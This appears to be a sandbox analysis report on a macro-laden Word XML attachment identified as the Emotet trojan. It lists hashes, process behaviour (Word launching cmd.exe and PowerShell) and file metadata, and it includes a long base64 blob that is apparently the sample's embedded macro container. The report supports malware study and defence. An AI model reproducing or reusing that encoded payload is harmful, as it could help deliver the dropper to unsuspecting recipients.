analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Untitled_attachment_20190122.doc

Full analysis: https://app.any.run/tasks/e4bd84dc-1f02-41cf-8193-fc5c792c5f7d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 20:06:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

97B9807F8760B5C01E67E55C7DC38BA6

SHA1:

8383168A11E46DD9C21AC6BA13DF279840522E6B

SHA256:

D85A986BB09329C2077689025F17E42359B537F9A5158193E014459E5F90FBF2

SSDEEP:

3072:7kZ2tiOgmunCTcfjL/xSu90OoiLuDKZXfwKeljR1z:7kgNuCTcfxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2920)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2920)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2588)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2708)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4064)
      • cmd.exe (PID: 2588)
    • Application launched itself

      • cmd.exe (PID: 2588)
    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2896)
    • Creates files in the user directory

      • powershell.exe (PID: 3168)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2920)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (60.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (28.6)
.xaml | Microsoft Extensible Application Markup Language (7.7)
.xml | Generic XML (ASCII) (2.1)
.html | HyperText Markup Language (1.2)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 19:45:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: QWN0aXZlTWltZQAAAfAEAAAA/////wAAB/ADPgAABAAAAAQAAAAAAAAAAAAAAACMAAB4nOx7C3gc xZVudfdIGj1GlmVZkmVjWrJsD0aS+/3w2DAPSZaNH/IDI4gAjaSRNbIeY2lkyc+MZAMGDAhCwDdh iWyyxMkCESRLvEk2GctcPpJNiEPY/bi5m41suLvefLl7RZKbeJMNvqeqq6fbBsIj+22+fN8duXqq q+s/fc6pU+ecqhqf+8HcmRPPV5xHV31uQBx653Iuyna1MbSQTxFCLL1/5/Lly3bz5f//+bP6/B5K Dh1DD3xnQcFj7oVSByUXSh6U66EUQPFBKYQyxzIBNBdKMZR5UEqgzIdSCqUMSjmUBVAqoCyEsgjK NVAWQ7kWCg+lEkoVlCVQqqEshbIMynIofijXQVlB+auB71ooK6GEoIShiFAkKDIUBYoKRYOiQzGg mFBWQQlAWQ1lDbFthG6EEqR0I/BdT+vv/ElH47/+sxUNwF8SxqIB9cP3INp7tSv4g59SsBibVv4H 9J28zZN//wuvMxzW/QKrbQeMYugjvfHKjxcxjP3+rA94r/3tftaJ4iDzH/N+lnHr88PidM5+vwJ2 ahB7/TifAng/9sN47n7Y9+M5vNlj1bEyMJ6jNOz5j30C9gH2/M9H1vzH8+M/Y/5jOjz68PMf+x97 /mO/hH2AgKz5j2l93Plv+xHbBzRAaYSyFkoTlHVQ1tN3bKDfm7D+oDTT+63I8R030/ot8N0C5VYo t9G2Vvi+HcodUO6E0gYlCqUdSgf60/gfRv5KiiEjzyBhBctO5KJESXYTh8ZZ1PmWxwOGsAg1Dw70 xDqSWVvwkATZkmy2ZM2zbF4O28uUeLOLc9ni1EO1y+6YiwrY9cWr2bxSxAwOJTuLBnpjN7ALhsCt gJ0PoF4Uawbj60ZL70DcCtS6dr8gCJIwpchCLfJ6PBGUx7GFTLEgKNrBJUiqE5YISyKrUOst8f7O gZEh1Dq0dygZ65M9UisXk+qSve1oyeYNDXxoOJka6Ism4wP9qI1D7OGGTQODfdHeLKikIoOoD0W3 pBoLEZ+am5tiVtS0RrjivOx7U31eFDpcubmrK95xZOfmetSVAm/QMb7zyazUtY+OV67dL9U3IqNe UCK1ahg1hmpFQQzXToTrG9TUzlAoFatQUlnS0Z2pr+8cjKI+vjHeGxtqDUYG+voG+j3ZG1G8Y3Bg aKAL3Ou27uhgrLMVbW5sXBdpEDXUunHb5rr6DRuyl9xTdHgjL2p1gpff3D72Jr8h3j41GB3cm1qa QqXjo96N2xrToaEbUGEo5dmItqHGI+GhaiQHYdqynfUKUqWGBrG2Qag3GhkhVGsgTy0SJE0wIkp9 sxAOK15hxNfZ+MZGSdiwPHwNn058b9nFlTAjqsQ0qh9nD+SMHypgIuOCcHCJcE14fEm6IIWeVAX0 l75U7j1pFCpXZS0clEMhvRamR61HiaBuQ1GF2mBYVxv1cFqTPfWho9rNQ7FBGKRQ/cZ1m9YdQmJr KJGojyZRtHXDQEe0txVtj/UlWneEG86CkvW62Gint/PTq7lgVQqdr2vwPTSDKoruqmPbjm0syf9q 6OKc8Jscmlc5zTQ+sACNXehUgoahrwVv5Osswl4zCJO8Yv492dKx7EXYRzVlhRlx/F+eAVe2+P4q ZoytOZn/jUNVVZ67rz+JlviShqhX+y4kJwtEpPPQEOaWL/Gt5Vb67q1Z6fvJ8+OVdb4BVdbljoqL A0gNbtbbSKfHrU4nEhV37eioyPNf9BW1OyGEKWXAX8J9Kbz2LWj4GdTrob4VytOc42QbH/jGIeyi n4Kbo3D/ItQZQsd225cvr0a4dvrG2lfvvtS9+akvn/pC6r8Z6Rsav7X8/MXIxtNvdv7y7h/XBNBV H0zk7MKnVl38VM/G53ef29z8gP84ds0cdec5yEnLGcZL70bh23s17OpXW4xtbLAJWGxaV4v5n2bu /9QfHC1YtK0K17FSthVlarQNIgOt2dwz4NBEtAl8E3ES4KHq0HZwUHE0BNFgALzyMLTHSGaUS6Vk mEn8ppTlqYsQfTPz7jUQrl9DY5p9zx62cF5oaXP1fjeugODGJ/0sbsOoCSKhVX+//vi+7QrTuJKn q9/1h9q7kRVD7U8Q0aQhB+W89xh4cRSBDlY0YKohdLeiraiL/q2Ah6sgRMcgZdegdAL5LvRTJsOh crVtf8TPO99lkD1KbkOnlvC5KRRKJgfj7cNJFON3hO/cFIXR5dfwVZ2KwRt6lS8vbyYcZYfYhEgi COqt294dH6ofCHYM98X6k74da/negfZoL/PEtoQn2sH0NkZ7h2JMwcnIYCyajLazvfOvbQZHH+uo 7o2i7HWd6PHtg+ywL9wwmhiAjiWLsA/sjSaDsfrYYHzP/OpIangoOdAX33ckwhwWP7LE2P+gWTw4 MN1fh+8NrCXuWrj/7BX+564dxPDRFf4HPB2snXSyfvo4n4KPkf/itd8RakpJMAHwx39U/oultJ3c h8HgXPYLN1r1O+FvG5hoM3wLH+P9RR9DfrxeXZ797vd/9NG33o9J2d7pw2BugtLv3F459T8GD8ha CnyIePNBZP4M400zrl8Vb0qsGpup2dyz6DNgZfthxaHCaBuw2jDAEQqwqqmHWhhWK7WQ2aiwAmmE WhhmhQEzsxYsph5WKCI81+AvBE8j8LQeHQRajfA0QlaQJllL1kI/hSAxLexmRULLhP74TRFow/Tx qhN/q/AXgucHM8bAMNjz4wgnkKH9cBGOHXPWLi20v/Ce/Z1IVZ4ZdRZdTdvu/166F96n/b34+8Oj aPX/6QcZ5h/6fEDQ+en7Bh3INnlddgUdYX9YFcEqDE2orTdgyGoVtbGxFuzAkGul+ggYgKaFGiNh GPn9jVLE0GHIjVpR0Q0Ya00Sa8MmDHJtRGtsNIxUY6OqhsIHfa8E11pB655t3gQErQEctNhYwX1W 0PK020GrqYMGrXPbPYN20MqOMYvmCiRsoWjSClvMY8URK2yx++6v/2OU96mbVnyZIe7DGguGZDhW zf4wGetgwMG89x9DPOCK1oi18hu8GVa1KIWcAvHmEHinQ8z7FDD5T+JX4A2MXPoy21/Zu+OHv3by nbKdFaFvH9CaJh6cb8JLgSwub2W2U/Coc+jwfTFKhUV7KRnbFSD077Y43vc34+uo/Bx695SI0mfZ KOTMmys+t3Lv3R73XNWQyR9KaP5wlLHetxDuD9fYUuH84SfP4yc24fdav7in4Ef7FKEPEz/eR1jn 8+cUP9xc2dyTe2jJL65jg+9S7ZX+zf4uoE9PkifHiJbyi8e51EfE33MF/qgn/RHxpVfgv+S5Us73 x9sfyzKPELwHvduQ3kuH6fdpv1rPzFU8fDDiPyEmRJjwmNc5QIM6FtFL63hTtYjWcR/equfi537a jjdaBVrHth+06hxub3JhW1zYNhe224UdpVj83pQLO+HCHnfxNunCTtE63rg87aJfzjh0/IxDR2Cc Pgbj0GliHB6aXdg2F7abcXhIuLApWn8aWT4qox/WoRNkHTpNrEOnmXXotLGODrtd2FEXNuXCHnVh j9P6o1g/rj4G59Bp4hw6zZzDZwvn0OnmHD0kXNiUC3uUc+hPuLCTtH43fJ1y9RE8Lj14XHrwODw0 e1x68Dg8dLuwoy5syoU96sIep/VDmB+PwwOf5dARshw6RpZDJ5jl0GnOcnhocWG7XdiECzvqwh7N csZxwoWddGFPZTm8Tbmw6SzHll5x9Ulku8Yi2zUW2Q4PE9musch2eDjlwp52YdMu7Csu7BvZji3N ZDs8jOY4dI7mOHQmchw6x3McOqdyHB6mXNi0C/tKjkP/nAs748JedGEvubDEYVGs1+tgy2kdH57x XhdvXofOKa9DZ8pF57SLziteh4dzLuyMC3vRhZ11YUmKRe3Hm+tgy3MdLJ/rYP25DtagdRw2g64+ F110LrnokIdURm+eSw95Dv98noMV8hyskefQD7qwzXkO/y0ubLcLm3C9d9SFPUrreCE/4epDdjco naJ8h055vtOHz3foCPkO/4YL2+TCNruwLS5sN60fwHzmu8bIRYecGlI63gKHTlGBQ4cvcHjwFzhY w4UNFjj0m1zYFlp/BL7aaB0f2F2CuseOO/jEM2Xl4zjA23G52Wf1xy6sxefw1uZzeEj4HB5GXX1S PoeHCZ8zjsdd2FMu7JTP4f+0C/uKC3vOhZ1xYS+63jvrwpIGqD+GdVvo9JksdOhMFTp0Thc6PKQL HTrnCh0e3nBhL7qwsy76l1xY7xwHWzTHwfJzHKx/joMV5jjYIK1jP9zk6jProkOSJNt+ilz2U+Sy nyKHB3+Ry35c2KAL2+TCttA63hNtK3L0c9FF55KLDjnxtv3hXIdOuVW3/MBcByvMdbDGXIeHoAvb 7MK2uLDdLmzChR11YY/SOj5EnnD1ueSi4y126BQVO/yXFzt0/MWODoViBxt0YZtc2GYXtq3Y4aG7 2OHhnIvOjIvORVefWRcd8isC25/Pc7Dl8xwsP8/hwT/PwRq0/hzm2dVn1kWH/ELBtqUSp09RicuW Sly2VOKyJRc26MI2ubAtJc44trmwCRd2tMSRPeXCTtA6LIDQcRd9fr7Llua7bGm+y5bmu2xpvsN/ iwvb7cImXNhRF/YoreO8bmK+Sz+lDh2+1KHjL3XoCKUOnWCpo4cmF7bFhW1zYbtd2FFa/xLWT6nD g1Dmsskyl02WuWyyzGWTZQ4P3S7sqAubKnN4OOrCHqf1Z+Brktbxj0aay52YMoH3Lt8jphwvt/rj mDJZ7tA/Ve7wcLrc4SHt6vNKucPDG+UO/zMu7KwLe8mFJb+0odiiBY4NlC9wsP4FDlZY4OjNcGGb aB2v9ZppncSvBY7spxdcKbu7XkXflaZY/GOfV67qb9O5uMDe9LgEtcfoPtl3QHUJbGlIYltKlsMK L446UAzuFfZn0P4MamFuQtvhfhVbjQyWQcuRxkYgE7p82SC4ILTfQNpXA5ZHYYr7ErJwTfC8kTyv Z28mOERwG9hyaFvPdpmC1qXwaBPFHecs3Fa2Ap43s1+s1erEOozDq/AX0RzUsap1xFAltbVXVEyz FdoK0KCkKnJrXR3+lw8tPgSVEeunLK1De1E+6UV+0CK1dvR11sVwixeNxviVHfxSSLqWo+0s5us2 4LeF8LuD3LdSvl5nLb7a4XkbeX4Hi4g8U0SeLrbFuxx10m0zHta7Fu5zVH+9bMui5aiHPse4USJP Lhoc2DkY7cM/3sAcRVcdEmrEpUstKZozD6GdSJGLzBppKb9yx6rN5J5Dm1ZGoPYMqkLVKAGcWb2G Ykm+d9eW+Bpyn41WHUrcot+M+13v6peDmoM9khDZTu7moJHafa27zPbR21aG1K7dSYT10s/+NsSj PSB3ksg9yNZt4mENb8n3O6qXA2xL/XK0j+1sHhhCuVi+4wzWQypjN4fYoV08Gqe4c1QvdxM7OMKG h+O9nXGMwzsUL8Kb12zdu2dn79KGtev9cF+IRGM4sFy7aVvdhs37uw9a/PIt9UPxWPVgR58c3dgZ JlLko8brBjYp/TXrli3rotoYGOSXdvHxfp7cFyK/FNDFgKgEZDWgB3BbHlIDmhFQzICuWZiAKAWE gBiQiBaOsv3Juq08Osa2FC1H97FSnYiKGnj0IJXnXmq3j2TknWBj/VieCWIPj7EtNcvRoyyLChv2 xHh0nOJ6Ke4JdgFgPsMOD3bE4hzGtVB7Bw7VgCJgVjUxIFNeFT0ga3C17ATf6lpAFQK6FECWPFCT lICmBWTL+jUijQjk5IClvQxdVcJXOktEGVMGnB4QsORPknlwkszHyYx9f57yP0Tn+ZdA7lNE7qfp vDjO4X7PEdwzGdwUxT1L5f5qBvcCxbVxiPBvMaspAR3PC5tVa4RlGDkloIJ4AqIakISAogYkNSCa AdoGN5IZUJSAFFBsrUAfRcTdFMsSlIAiA5WAJmE4lvdFIu/X2RZ+OTqd4fublO8XqLzpjF/7FuX7 FMG9RObBdAb3MsXtovb+PcB9l+BeobgEwb0G7edI+6vk/nWK+yF93xtknvyDy38YrGUfIA6IDIMK suogJ5ZcNbFx47G27Bf3EwJmANpBUMkA1dGZgA0GWqFJMSxLAcvHDWAsFtKLiK4BY92Rt0B/y1os 7cFTalUFWKNkHLDqsT5/TOT5J8L/P2b0MkPl66L+461MHLlA9dJC/MfFjL7+mdD5GcWVUty/ZfzS zymOJ/4D86ESUfE/YiFCQJLxP+ArI5kmY2FVSxd6QFNpi6ZTS8OSKbhdMah3wRoEtUI/ibaACoCm hh9Qraoq1hm8WQbLUrEWZllL7l+ROPCLjB5+TeX5azoffpuJL5eoPM2k3zus5bWXo/8gekCchTtL cR4Oxx+Wc+yjnOC8nB3Pssl8zKO4LdSuCjnMTwH38uWXX375MsbhnSoy/wxbgVgi+MooUJPpnNOI S1LxM516WrglapSoN8F6UCTcqBiWHbr0B6o2iHct4uovJxKJyzwqBX5LOMxvMfDEo3LK70E6fxZx eH5VuPgVcrBcPGfbwWKCq6K4copbxmH7q3bhLmVj3AqiNz9t51ENxe2kOIHDfrnOhcO7jEQ/YCOy iIXDUuEbIyBquBUUR+3LNkBLF44GJYFqUFaozQGMei1QpywTpRoBzbYnokaDqs6ibSlQ0+mchUci dmNEnxJn25dG+Fcy9waVbx61m9Wc7cdWcZbdzGThfmFoD5JxuIHYTT3FtVNcE4f9eqPL3k4R3Aau pQDyusz7NlHcXjuv4+z53Ezfh3ediaWoGpZaFEF/+N6ZvQGB+ipqfjqxH8ufS3gAyJyl9mY5J2yB Bp2veAqLuF0kutlO5Gnh7Lizg9zfRvksoHzewdlxvJXy+YoH92vP4NoIrpPi9tP51J3BdVHchAdZ 40pHjzCY8bMwMSTD9kZ0hC3J7CkiKdRWiLnBGMP80pA96uDfsc3ZUVAXnWlLpO3hrHHo53De0psZ lwTl+1Yqb5Kz/c4g5fsNIt8oZ8elPeR+H8X9C50fh4j/OOCyg0nOGk+3x8C8qiRwqDQ65yJg3SRh hdo4DL1BI41mxRIfjvMWDMZcpR7FwEJbXlqxNGVkXIpjJyKO+jh/IN43lZF7Owu6YPOhdpRcnyTX F8n1x+Q6S65FHL5K5LqdXHvINcVhenXUf8dx/s/i9VQws56aJP757ozejhC9HaV6+x3V27HMvLuP 6rub4CbIvHoww+8jFPcFOk6PEf/3qEvfAsF9hsP55fEM7gmKW0PtcjJjt0/S911iEPXiOlGnkcke 8BwjLhsbZybGSRK2P0gxqa1BnqjYYU6jYyNjGgrJuRR7VCE1lei4SpadwzCTLvZ4QlUXSB6GdXuS 6OvpTBz4PLk/dVUceIb48y+59OAn+cIUh9exz2X08ALFvUxxL2b08FWqh1nS7+vET57O4L5JcYN2 vpfxh9+iOHw6izUDNq7TDIzEN6gqduKpZry6RtIi/A/a7dhoJU9gqppCW3D+KmBSqkK9FxBSFaLQ TITF/d9FBU8BO38DEpgLgXiAae53ENdeztjbS+T+FSrfKZpHfS/jl79rz/85WA/nSHx8NaOX1yju i9Qe/yETd1+nuMk5iM5CogKwLiw1lkXEOTz+p9hrDZo90tybrFIUogMRo6nmBOoDZPAndtaKU1iT OMiAFqCZPDh4nbwR08SSv8Hx6B/JuP44w/8/Uf6fovZwgcy3GZcdzRTifv+csZO3iP1dtOMDxf08 4y9/RuU+RXCzGTv5N4L7BcWdpLhfc3ae+ys7/hVa+iJmkDEAa2aScSei2vNQJH6PrFpoXg/+H/s+ 8kBT7XUOnsASnmdkTl3KyP8fGb/0W8LfO5S/L1M7YD1YX/avzzF/+KSER9keHNc9HpuO12PhvNQO Cjw4DuS5cPh0xlp3gF+3jBqGVbHmCLZpy+PgRRy1bHsdodjRzFpIgG9QRVsuibh/7IiwXIUZfoo9 tlxFJE6XUP5qqFzlHntcSj3U/xXgfos82G9WZOgspjiTylXlwf6Wd8mVLkBUhsyyES/BSBvxAnjA yJiIdMwUYr0KbqJ2j3M+Ha8aVINmc1akk+0sRnO0RnWBdSfirQBVyfgUe+pgu7GzR9yRelNr/lcT ffg9eD27LCPnCirnbqqfOvK8xiXnG/lkX5DIL2RwCsU9TO3ZIHahuXCTBLfaY8+PVeT9N1BcNdVr 2GP7myAdD3zCSTyeGbCcpS5bWRG4MonGeryqkzKOlObBlneUaQ6lazgjomtVBc8A2aS+RdbpUldU qW/BnW1PohJt1XssOZuIPTdm5F5P+f8xlXuTx57HGyj/p/Jwv60E15zBbae4MopryeB2UBw+dbZ2 ItzjieeDZA8m9XqKlR9ZzlC25gPhX8JGYUkMosl2Ngx+EtqteYf/0f0dShTPQCzxbWR87vDgeNqa 4bvN5pvaR6fHzmvbKd+nc8k+Z0aeLkKnh+KepXGzP2MHvRSHN6et+QPat9y6bs0fnC3gnQs1YI0L 3ZezRkcJaBkvYSmJeg07YNjxkIQUE8dZK5OeAy3UhIjPEWk/E8+nd+8FSQL1pVg3iYw+kmRcBzP3 e6icW6mc+4jfHHX7Py/udyhj5weIflIUJ1PcEY8dZ8apftq81r4w+AhwAQrJKmA1BCogaZlm2W4u 8YTEyVM9gI+0OjnegeiJOBHbo2YUYa83CxH2WGS/RrVzsjk4LuvGdZ0DPN5GlodppOmU1lTKw51S ZSXeWV5F5svddL6chFg7TTLkN8j1ErkWevC1mlzryfU2ck2Q690eTGGcs/Lo7hycR6eI/nAe3ULW 9cc89r7HfUR/D1L9pez91oxfn6D64wnuMY+dPz5KcMcproLq/QmPnQ99huIukv2ASQ/OH5/MjPNJ ivsRnb9PE3/4edc4T2Vb9nxoaVeNWLlsWbwL7zXHiC/bPczrBh/r6B6wd56JAletIGpcU2nN2QPk RGI0dvUuPiIaPkX4P+VZjo56sJ6C8L7HPGnKXx2sZ8aJro8SnU6BXM95WLznCrgB6F+UbZ38eLMz v5Mv/Jv3+5180hCRjv9zVuNwP+rA/8uXjyvgOGX/db68zaifbxgcHBjki7bGhobR1KbYaCrpy+tS JR1UEalv7/X3SIpHMNDWbbHeWAdK8pHoUIwfScuy7svjsxC7DCKd4suLq5JHVJG5uSPp7z2iCazR 0N/Jc6srWalbURWmans02O8fEU3J94k+ryoJha2iLvj4vBHJMBlzw0D3Tn8POieiTxe0thcZgmGm bmyMjwb9HZpq6AWtHU2mJhbWmRKqa/fqsjG2d9vOfn/RkKkqvrouU2Y1VFNFTpKQfZSEzNYq/nq+ ajBFD5MYhmO9KMs6RirC50jj3qFkDNlnSGyM9VoHSNuXNqe+24t2KanaSHpgyN9jyOyae1/ku0RV N3xf06UQ+to+WVfE1KJtaPegf1iRNXPBQ0d3GTAYZev6k0H/HlXQpWP1Sa9sKA/WK6LqC+btUyRZ HiusT0WTMX9cNqZ7Qutae2RBkILeqrR1NJTOndYyh0bXsFzzy9mprLDHrJGC1ilRmNvkWRk5w0S6 B/2yR7lubBs5GirCZ0PTOasOJZpu0W++y6vI497moHUYxHpHkH0QFKQnQdtHClSdvS9dEvb3aB5F eGCs31ANObZpu5by9BvBo2dWh8f3plePmIIo/2C7MKDr2tia0N8MSYqkPzDVm971YJmiRVFvl6Yb Y1NnvtBzD3qCWZa7vc8Eutszpz3etev9rInPepB92OPpPjjuISc9yD7q8XSGpz3kmCdtnfNcYND+ oHXEc5LxI/t4hyfnO2EW0mL7cIeZZujJTn1AmvR3SSLTHqnf1p/uA8vyrR1p0lSzz28KM40j5bpq RGNnliQV84ikrfS3q6bO3JKKhAcGev0dfPPLaspz7x0JWaxs3XUMGbrmy9sjKXdrZ/KZ2zoVQ6nM 2RL3x3XlDFfVtkj1wtJn7BqcvDIvXUOPb7L1s9dMMuTkpjygS29WziBJCWzXtLeytJOVYjBXlt/i GvJUick/6RXlJaG8tmw9IMws69VaTSm6uvLe4GPKs5GEX5akV/eKTH/UZJ56fGt/p3+XIRwRhTnL OyRBPbGwciy/29SNB6Res0r88hdMRZzcK5q9isl/Yix/aOa5Z6V4tybLZ0qr0jeixVqrEuiozloc vkZuW6uUBFS+WrjAQGS0M3Ix2+SqgwyJJFM4yixhZziFX8/NeMPZ1olKE4RR5FEDM0uj3MyZ6WPb koP+Ia1AVSvnrQt1iqp4eM6y0MkhQ9KMtooFldNx7aEXJ9f2GEJH9UZm36Cosfu+k9/jV3Xl1Xx5 bGyXxKVvSueHkv3+buWYIWxcls7vlkR2X2pbvN/fqyiV2t54fod04tCMJ4LY/yVNC+muXZogMQeZ Me+ILG7K3yeq6lp2LLg8eD2EvMkV+t7qFao5Nnpia+Vw6GnhOOQMk2zbCsmYWfCDryyYqhEYxCjG WzUi+z+KFooSx55bpM6w0+h3fFBYaFQvLK6YYhI5rzEPBRduXXzimsqFuiCdD6x7LV8ygreCh5sT rTbVH0AygZp7zHJFF/j5P/xknyK9rH4/kCiOqga7ekvZr5NvH3giNDRT09w4b34z+tfwfFVOZ/VO hM5kDd75xi5NeU38q5Ao1wk135QCE3MrEVuYuEESStfLiRLl9bmafL5Yff4CA2uJia0so3162/eM wGx5GzA+z5Mu++m5m5u5X3J8SULQdtf9gmlR1cBsKcqRp1aqtcGSTrSUMSMXhhOixxR+siRuaLJ0 V90OZWZJVDTFysOhsU92GaaifC68b1RUpAtZqeHEeP/K9hJTv6PE3LIyLon3iZWNEWbHsG4UHx66 tUQo262cS7Utqrx/z4siQqsr4umCTXcZzU1Cp6GqLzwYnjOoNErMhhUVhmgwbFVdYOI6ueLCPAM1 CIHvyxXa2VZpgRhoW5HouzbMptEjFSWLZksVKdCi6oGVFZOLDKF8xKuLWqi4KTbqLxjShfiBgn2G Kjz17dBYwYgiv21GBseFbllXfU81F7erHD+4pbh7MOzv0uSi1M+zEurUQt9imOozpzrMWX6Sm6vt 0beqNyZ5fipf2lPRUy5pWoi/1RgSjc3nR1PeJWhcktWZJT3lomCe4OYujptqlfm3+d2qPHhzVWD3 uTpYjDaX/GL+D5Hxq4AYrNXPL5CYYeUl9Hu1QvK0C+VPyVNcFTtT8Y78w7LzeuSecVFYzylh9v9s UZCyfV+KEZkOZmHb3MjcOx8Go9aV3w+MvCO2DV0zX6g5d3bicfGm59u9A5rw7Rd4fsg8PLn3lxW3 +HfL4gPdG4bliXu+n2Vowr0jzxmJtgkuujc5+3dmanFujRxVxvdHNvTvLPJ3m/LfZnWYxrwt+/6u wjDSFXHTqFH1qay3m9sf2p+3q6O5qHJuVUCdPDazQPz21IKnSv96QfAvWOb/yvruyU+dLWselQIz pao5j/2NsFFYzy+UOjfOVrRtbGNWiTNl3RN/ESoJHelVPxGsLqiNNw8++WWdqR0aeHuouSB0ovmz 0pkVi4p33zNZcv4TYNSqoNz+jY3oixpff32xKM1m92iacOClrJ6Zjk0NmvGO+Foy2CpNbS3k5vCD ReGv/X1hp/8kI+6eO3et8in22xNPnfvK1MnZE/OYxF9KZ4Rrf8WMlSVOzM57+yudmnF2+ofsVwdV WXj4pX83hT5NUl9tmFrsyxMGTEmpfPj87YNagS7+voAv6tYEObDl2rF7olO/qWTPZD19GpIdK1eB LFcwVEhWOMhWJhUD8pZ2yFl0EdKjCKrHobhH12FVAgkR5CyIJ5lOEsJ1VBFUE4WrMjvfDOMhGYVq CmRvNY+t0MQU3fVmK4LWjjdaZSTwCoctZnysqN2hZ1cjBS1GYcWjagkcyZDEFjJxkVXQHrKjXZUC 96JAUobuL4JcRkNjkBQcESSUg4Mpk+OFmMOUxsGhh1VUiv0ely+GxnPiMOmUVH53kSprRorbpSvT 0hgX1wxxbN54kuEOQdKHcz6+35fny7sri9/DS6Iq+9FDm/sRzfy2Isj8+mL8ptj4KHq0B0xPR5sQ dsJxA7I0JVXCneSmOyRTKTZ906qApncrkC9IqUUbBnb6kwlZkLXUotwz6H/u84qCNvYjnJfl7UnJ RkFdr6mqxZqvzpTRwagq1WsKKouE9wZHh4sgEqsPlXVBoigwe60AXBhPFZzh162Mi5rGGr5yTfTl DekeTR9bgwNgtEgCh7yhbEiTX5BCdVWB9EFmvxF6oGx6JP1Ier+aOqwHJC7sQY9b+9rjwtljZEv7 zMOFUvrhem/6CbyR/Ssl8N+PKcE5L30mMjf4ZD7rZQuMsTy8wdINUS410Z0eH4s0IXBGnaICwqWu /46ZlNKPfN+UjUq0Kq4KBvO5xnh61J+QZc23KhgvgsRJHvNCthzs9e8WNf2B+EhW+lZpYxkkvmCs +2BCBOOhLXvEGkNkHnowJZ+5dV0/n4QMUN74+LBUbYiFKVHk80dUjyiF8iGxu8Vf1KfJSu2Bfabx slKlTO7XA2JbsnrPN4LM5Eqp/bpJZfo6babuSXVMmkGcUHW9EEDDrOZhre3GWbzhnMXyh89n1WsJ vMF83vt5rlIWvh6o/KQcLhjLCc0R0mrTsGkED67hQx0jBaIRrfui2qEqOlP4Wc0QfHkDukcwz6/G 